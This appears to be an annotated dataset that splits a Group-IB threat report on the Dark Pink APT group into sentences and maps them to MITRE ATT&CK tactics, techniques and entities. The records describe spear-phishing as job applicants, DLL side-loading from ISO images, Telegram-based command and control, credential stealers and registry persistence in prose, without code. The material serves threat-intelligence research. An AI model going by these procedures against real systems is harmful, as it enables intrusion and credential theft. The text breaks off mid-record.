{ "uid": "aptnotes-08_aptnotes_report-p1-s7-8a2514", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Bearing this in mind, we will refer to Dark Pink as an APT group throughout the entirety of this text.", "sentence_text": "The name Dark Pink was coined by forming a hybrid of some of the email addresses used by the threat actors during data exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s8-dc6efb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "The name Dark Pink was coined by forming a hybrid of some of the email addresses used by the threat actors during data exfiltration.", "sentence_text": "The APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s9-e1090d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "The APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers.", "sentence_text": "There is evidence to suggest that Dark Pink began operations as early as mid-2021, although the group’s activity surged in mid-to-late 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s10-a5be23", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "There is evidence to suggest that Dark Pink began operations as early as mid-2021, although the group’s activity surged in mid-to-late 2022.", "sentence_text": "To date, Group-IB’s sector-leading Threat Intelligence uncovered seven confirmed attacks by Dark Pink.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s11-91a4d1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "To date, Group-IB’s sector-leading Threat Intelligence uncovered seven confirmed attacks by Dark Pink.", "sentence_text": "The bulk of the attacks were carried out against countries in the APAC region, although the threat actors spread their wings and targeted one European governmental ministry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s12-b38bfe", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "The bulk of the attacks were carried out against countries in the APAC region, although the threat actors spread their wings and targeted one European governmental ministry.", "sentence_text": "Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p1-s13-397c4c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam.", "sentence_text": "In line with Group-IB’s zero tolerance 1/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p2-s14-3c4839", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "In line with Group-IB’s zero tolerance 1/29", "sentence_text": "They leverage a custom toolkit, featuring TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names dubbed by Group-IB) with the aim of stealing Of particular note is Dark Pink’s ability to infect even the USB devices attached to compromised computers, and also its ability to gain access to messengers on infected machines.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1091", "name": "Replication Through Removable Media" }, { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "Use a custom toolkit with multiple malware to infect USB devices and access messenger data on infected systems.", "entities": [ { "text": "leverage a custom toolkit, featuring TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers", "start": 5, "end": 111, "label": "Action" }, { "text": "TelePowerBot", "start": 42, "end": 54, "label": "MalwareTool" }, { "text": "KamiKakaBot", "start": 56, "end": 67, "label": "MalwareTool" }, { "text": "Cucky", "start": 73, "end": 78, "label": "MalwareTool" }, { "text": "Ctealer", "start": 83, "end": 90, "label": "MalwareTool" }, { "text": "infect even the USB devices attached to compromised computers", "start": 213, "end": 274, "label": "Action" }, { "text": "USB devices", "start": 229, "end": 240, "label": "Infrastructure_Indicator" }, { "text": "gain access to messengers on infected machines", "start": 300, "end": 346, "label": "Action" }, { "text": "messengers", "start": 315, "end": 325, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p2-s15-b6a785", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "They leverage a custom toolkit, featuring TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names dubbed by Group-IB) with the aim of stealing Of particular note is Dark Pink’s ability to infect even the USB devices attached to compromised computers, and also its ability to gain access to messengers on infected machines.", "sentence_text": "Furthermore, Dark Pink threat actors utilize two core techniques: DLL Side-Loading and executing malicious content triggered by a file type association (Event Triggered Execution: Change Default File Association).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" }, { "id": "T1546.001", "name": "Event Triggered Execution: Change Default File Association" } ], "procedure": "Use DLL side-loading and file association hijacking to execute malicious content while evading detection.", "entities": [ { "text": "Dark Pink threat actors", "start": 13, "end": 36, "label": "ThreatActor" }, { "text": "utilize two core techniques: DLL Side-Loading and executing malicious content triggered by a file type association", "start": 37, "end": 151, "label": "Action" }, { "text": "DLL Side-Loading", "start": 66, "end": 82, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p2-s16-04be5b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "Furthermore, Dark Pink threat actors utilize two core techniques: DLL Side-Loading and executing malicious content triggered by a file type association (Event Triggered Execution: Change Default File Association).", "sentence_text": "The latter of these tactics is one rarely seen utilized in the wild by threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p2-s17-efdafe", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "The latter of these tactics is one rarely seen utilized in the wild by threat actors.", "sentence_text": "At the time of writing, Dark Pink is still active.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p2-s18-8bef1e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "At the time of writing, Dark Pink is still active.", "sentence_text": "Key findings\nDark Pink launched seven successful attacks against high-profile targets between June and December 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p2-s19-cd0fda", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "Key findings\nDark Pink launched seven successful attacks against high-profile targets between June and December 2022.", "sentence_text": "Their activity peaked in the final three months of 2022 when they launched four confirmed attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p2-s20-e68f57", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "Their activity peaked in the final three months of 2022 when they launched four confirmed attacks.", "sentence_text": "One unsuccessful attack was launched against a European state development agency based in Vietnam in October 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s22-cc30f7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "2/29", "sentence_text": "Dark Pink’s core initial vector was targeted spear-phishing emails that saw the threat actors pose as job applicants.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use spear-phishing emails while impersonating job applicants to gain initial access.", "entities": [ { "text": "the threat actors", "start": 76, "end": 93, "label": "ThreatActor" }, { "text": "pose as job applicants", "start": 94, "end": 116, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p3-s23-70b5e3", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "Dark Pink’s core initial vector was targeted spear-phishing emails that saw the threat actors pose as job applicants.", "sentence_text": "There was evidence to suggest that the threat actors behind Dark Pink scanned online job vacancy portals and crafted unique emails to victims that were advertising vacancies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1593", "name": "Search Open Websites/Domains" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Scan job vacancy portals to gather target information and craft phishing emails tailored to victims.", "entities": [ { "text": "the threat actors behind Dark Pink", "start": 35, "end": 69, "label": "ThreatActor" }, { "text": "scanned online job vacancy portals", "start": 70, "end": 104, "label": "Action" }, { "text": "crafted unique emails to victims that were advertising vacancies", "start": 109, "end": 173, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p3-s24-e69117", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "There was evidence to suggest that the threat actors behind Dark Pink scanned online job vacancy portals and crafted unique emails to victims that were advertising vacancies.", "sentence_text": "During our investigation, we noticed only one public tool: PowerSploit/Get-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s25-f33002", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "During our investigation, we noticed only one public tool: PowerSploit/Get-", "sentence_text": "MicrophoneAudio.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s26-297de7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "MicrophoneAudio.", "sentence_text": "Another technique leveraged by these particular threat actors was DLL Side-Loading, which they used to avoid detection during initial access.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Use DLL side-loading to evade detection during initial access.", "entities": [ { "text": "these particular threat actors", "start": 31, "end": 61, "label": "ThreatActor" }, { "text": "leveraged by these particular threat actors was DLL Side-Loading, which they used to avoid detection during initial access", "start": 18, "end": 140, "label": "Action" }, { "text": "DLL Side-Loading", "start": 66, "end": 82, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p3-s27-f5eceb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "Another technique leveraged by these particular threat actors was DLL Side-Loading, which they used to avoid detection during initial access.", "sentence_text": "The threat actors created a set of PowerShell scripts to carry out communication between victim and threat actors’ infrastructure, facilitate lateral movement and network reconnaissance.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "Create PowerShell scripts to enable communication with attacker infrastructure, perform lateral movement, and conduct network reconnaissance.", "entities": [ { "text": "The threat actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "created a set of PowerShell scripts to carry out communication between victim and threat actors’ infrastructure, facilitate lateral movement and network reconnaissance", "start": 18, "end": 185, "label": "Action" }, { "text": "PowerShell scripts", "start": 35, "end": 53, "label": "MalwareTool" }, { "text": "threat actors’ infrastructure", "start": 100, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p3-s28-80c3e7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "The threat actors created a set of PowerShell scripts to carry out communication between victim and threat actors’ infrastructure, facilitate lateral movement and network reconnaissance.", "sentence_text": "All communication between infected infrastructure and the threat actors behind Dark Pink is based on Telegram API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s29-524e71", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "All communication between infected infrastructure and the threat actors behind Dark Pink is based on Telegram API.", "sentence_text": "Dark Pink takes on all comers The attacks carried out by this particular APT group have been advanced in every sense of the word.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s30-d3163c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "Dark Pink takes on all comers The attacks carried out by this particular APT group have been advanced in every sense of the word.", "sentence_text": "They have utilized a sophisticated mixture of custom tools to breach the defenses of multiple government and military organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s31-934303", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "They have utilized a sophisticated mixture of custom tools to breach the defenses of multiple government and military organizations.", "sentence_text": "The first attack Group-IB analysts were able to attribute to this APT group was registered on a religious organization in Vietnam in June 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p3-s32-d8a60c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "The first attack Group-IB analysts were able to attribute to this APT group was registered on a religious organization in Vietnam in June 2022.", "sentence_text": "According to our research, the malware initialized by the threat actors can issue commands for an infected machine to download modules from this particular Github account.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use malware to issue commands that instruct infected machines to download modules from a GitHub account.", "entities": [ { "text": "the threat actors", "start": 54, "end": 71, "label": "ThreatActor" }, { "text": "the malware initialized by the threat actors can issue commands for an infected machine to download modules from this particular Github account", "start": 27, "end": 170, "label": "Action" }, { "text": "Github account", "start": 156, "end": 170, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p4-s34-c106a9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 4, "sentence_id": 34, "context_before": "2022 (below)", "sentence_text": "Following the June 2022 attack, Group-IB researchers were unable to attribute any other malicious activity to Dark Pink.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p5-s36-fe68b9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 5, "sentence_id": 36, "context_before": "4/29", "sentence_text": "Kill Chain\nThe sophistication of the Dark Pink campaign is evidenced by its multiple distinct kill chains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p5-s37-4ca26c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 5, "sentence_id": 37, "context_before": "Kill Chain\nThe sophistication of the Dark Pink campaign is evidenced by its multiple distinct kill chains.", "sentence_text": "The threat actors behind this wave of attacks were able to craft their tools in several programming languages, giving them flexibility as they attempted to breach defense infrastructure and gain persistence on victims’ networks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [], "procedure": "Threat actors develop tools in multiple programming languages to breach defense infrastructure and establish persistence on victim networks.", "entities": [ { "text": "The threat actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "craft their tools in several programming languages", "start": 59, "end": 109, "label": "Action" }, { "text": "attempted to breach defense infrastructure", "start": 143, "end": 185, "label": "Action" }, { "text": "gain persistence on victims’ networks", "start": 190, "end": 227, "label": "Action" }, { "text": "their tools", "start": 65, "end": 76, "label": "MalwareTool" }, { "text": "defense infrastructure", "start": 163, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "victims’ networks", "start": 210, "end": 227, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p5-s38-3dee57", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 5, "sentence_id": 38, "context_before": "The threat actors behind this wave of attacks were able to craft their tools in several programming languages, giving them flexibility as they attempted to breach defense infrastructure and gain persistence on victims’ networks.", "sentence_text": "Initial access was achieved by successful spear-phishing emails.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Phishing", "id": "T1566" } ], "procedure": "Initial access is achieved through spear-phishing emails.", "entities": [ { "text": "was achieved", "start": 15, "end": 27, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p5-s39-2c90ca", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 5, "sentence_id": 39, "context_before": "Initial access was achieved by successful spear-phishing emails.", "sentence_text": "Once the ISO image was downloaded by the victims, Group-IB identified three distinct infection chains, which we will detail below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p5-s40-08b2d7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 5, "sentence_id": 40, "context_before": "Once the ISO image was downloaded by the victims, Group-IB identified three distinct infection chains, which we will detail below.", "sentence_text": "The first thing that caught our attention was that all communication between the devices of the threat actors and the victims was based on Telegram API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s41-264639", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 41, "context_before": "The first thing that caught our attention was that all communication between the devices of the threat actors and the victims was based on Telegram API.", "sentence_text": "commands via a threat actor-controlled Telegram bot.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s42-b112e2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 42, "context_before": "commands via a threat actor-controlled Telegram bot.", "sentence_text": "Interestingly, these modules were developed in different programming languages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s43-6014e5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 43, "context_before": "Interestingly, these modules were developed in different programming languages.", "sentence_text": "The threat actors have used the same Telegram bots for a long period of time, as one has been used since September 2021.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Use Telegram bots as command and control infrastructure over an extended period.", "entities": [ { "text": "The threat actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "have used the same Telegram bots for a long period of time", "start": 18, "end": 76, "label": "Action" }, { "text": "Telegram bots", "start": 37, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p6-s44-4845c4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 44, "context_before": "The threat actors have used the same Telegram bots for a long period of time, as one has been used since September 2021.", "sentence_text": "Additionally, Dark Pink APT utilizes the self-made stealers Ctealer and Cucky to steal victim credentials from web browsers.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Use custom stealers to extract victim credentials from web browsers.", "entities": [ { "text": "Dark Pink APT", "start": 14, "end": 27, "label": "ThreatActor" }, { "text": "utilizes the self-made stealers Ctealer and Cucky to steal victim credentials from web browsers", "start": 28, "end": 123, "label": "Action" }, { "text": "Ctealer", "start": 60, "end": 67, "label": "MalwareTool" }, { "text": "Cucky", "start": 72, "end": 77, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p6-s45-12321a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 45, "context_before": "Additionally, Dark Pink APT utilizes the self-made stealers Ctealer and Cucky to steal victim credentials from web browsers.", "sentence_text": "We will look at each of the above mentioned tools later in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s46-d1c1a1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 46, "context_before": "We will look at each of the above mentioned tools later in this report.", "sentence_text": "At this stage, we will turn to detailing each step of the infection chain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s47-7a0bf7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 47, "context_before": "At this stage, we will turn to detailing each step of the infection chain.", "sentence_text": "Initial access: In one such attack, Group-IB was able to find the original email sent by the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s48-142305", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 48, "context_before": "Initial access\nA large part of the success of Dark Pink was down to the spear-phishing emails used to gain initial access.", "sentence_text": "In one such attack, Group-IB was able to find the original email sent by the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s49-507d33", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 49, "context_before": "In one such attack, Group-IB was able to find the original email sent by the threat actors.", "sentence_text": "In this one instance, the threat actor posed as a job applicant applying for the position of PR and Communications intern.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Impersonate a job applicant to craft a phishing scenario targeting victims.", "entities": [ { "text": "the threat actor", "start": 22, "end": 38, "label": "ThreatActor" }, { "text": "posed as a job applicant applying for the position of PR and Communications intern", "start": 39, "end": 121, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p6-s50-fe3b3b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 50, "context_before": "In this one instance, the threat actor posed as a job applicant applying for the position of PR and Communications intern.", "sentence_text": "In the email, the threat actor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan job boards and use this information to create highly relevant phishing emails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p6-s51-f0c097", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 6, "sentence_id": 51, "context_before": "In the email, the threat actor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan job boards and use this information to create highly relevant phishing emails.", "sentence_text": "The emails contain a shortened URL linking to a free-to-use file sharing site, where the victim is presented with the option to download an ISO image that contains all the files needed for the threat actors to infect the victim’s network.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Phishing", "id": "T1566" } ], "procedure": "The emails include a link to a file-sharing site that leads the victim to download a malicious ISO image.", "entities": [ { "text": "contain a shortened URL linking to a free-to-use file sharing site", "start": 11, "end": 77, "label": "Action" }, { "text": "download an ISO image", "start": 128, "end": 149, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p7-s52-b62d00", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 7, "sentence_id": 52, "context_before": "The emails contain a shortened URL linking to a free-to-use file sharing site, where the victim is presented with the option to download an ISO image that contains all the files needed for the threat actors to infect the victim’s network.", "sentence_text": "image on a file-sharing site.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p7-s53-4dcb08", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 7, "sentence_id": 53, "context_before": "image on a file-sharing site.", "sentence_text": "The ISO images sent in the spear-phishing emails contained varying numbers of files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p7-s54-662967", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 7, "sentence_id": 54, "context_before": "The ISO images sent in the spear-phishing emails contained varying numbers of files.", "sentence_text": "The file contains “.doc” in the file name and contains the MS Word icon as a means of confusing the victim and thinking that the file is safe to open.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": [ { "name": "Masquerading", "id": "T1036" } ], "procedure": "The file is disguised as a legitimate document to deceive the victim into opening it.", "entities": [ { "text": "contains “.doc” in the file name", "start": 9, "end": 41, "label": "Action" }, { "text": "contains the MS Word icon", "start": 46, "end": 71, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p8-s55-a0024a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 55, "context_before": "The file contains “.doc” in the file name and contains the MS Word icon as a means of confusing the victim and thinking that the file is safe to open.\n7/29", "sentence_text": ".doc and .dll files are in hidden view.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s56-1f2929", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 56, "context_before": ".doc and .dll files are in hidden view.", "sentence_text": "This is a technique used by threat actors known as DLL Side-Loading.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s57-80840a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 57, "context_before": "This is a technique used by threat actors known as DLL Side-Loading.", "sentence_text": "The primary function of the DLL execution is to ensure that the threat actors’ core malware, TelePowerBot, gains persistence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s58-fad516", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 58, "context_before": "The primary function of the DLL execution is to ensure that the threat actors’ core malware, TelePowerBot, gains persistence.", "sentence_text": "Trojan execution and persistence One of the most interesting discoveries for Group-IB researchers was the process of how TelePowerBot or KamiKakaBot are launched on the victim’s machine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s59-474d5c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 59, "context_before": "Trojan execution and persistence One of the most interesting discoveries for Group-IB researchers was the process of how TelePowerBot or KamiKakaBot are launched on the victim’s machine.", "sentence_text": "As mentioned previously, the malicious DLL file that contains one of these two pieces of malware can be located inside the ISO image that is sent during spear-phishing campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s60-18238b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 60, "context_before": "As mentioned previously, the malicious DLL file that contains one of these two pieces of malware can be located inside the ISO image that is sent during spear-phishing campaigns.", "sentence_text": "In two other cases examined by Group-IB researchers, the threat actors behind Dark Pink launched their malware by the DLL Side-Loading technique.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Launch malware using DLL side-loading technique", "entities": [ { "text": "the threat actors behind Dark Pink", "start": 53, "end": 87, "label": "ThreatActor" }, { "text": "their malware", "start": 97, "end": 110, "label": "MalwareTool" }, { "text": "launched their malware by the DLL Side-Loading technique", "start": 88, "end": 144, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p8-s61-09c6da", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 61, "context_before": "In two other cases examined by Group-IB researchers, the threat actors behind Dark Pink launched their malware by the DLL Side-Loading technique.", "sentence_text": "Kill Chain 1: All-inclusive ISO", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s62-b35b35", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 62, "context_before": "Kill Chain 1: All-inclusive ISO", "sentence_text": "The first variant of the infection chain results in an ISO image being sent to the victim through spear-phishing emails.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Phishing", "id": "T1566" } ], "procedure": "An ISO image is delivered to the victim through spear-phishing emails.", "entities": [ { "text": "being sent to the victim through spear-phishing emails", "start": 65, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p8-s63-a5389f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 63, "context_before": "The first variant of the infection chain results in an ISO image being sent to the victim through spear-phishing emails.", "sentence_text": "This ISO image includes a malicious DLL file, which contains TelePowerDropper (name given by Group-IB).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s64-7c34d2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 64, "context_before": "This ISO image includes a malicious DLL file, which contains TelePowerDropper (name given by Group-IB).", "sentence_text": "The primary goal of this DLL file is to gain persistence for TelePowerBot in the registry of the infected machine.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup 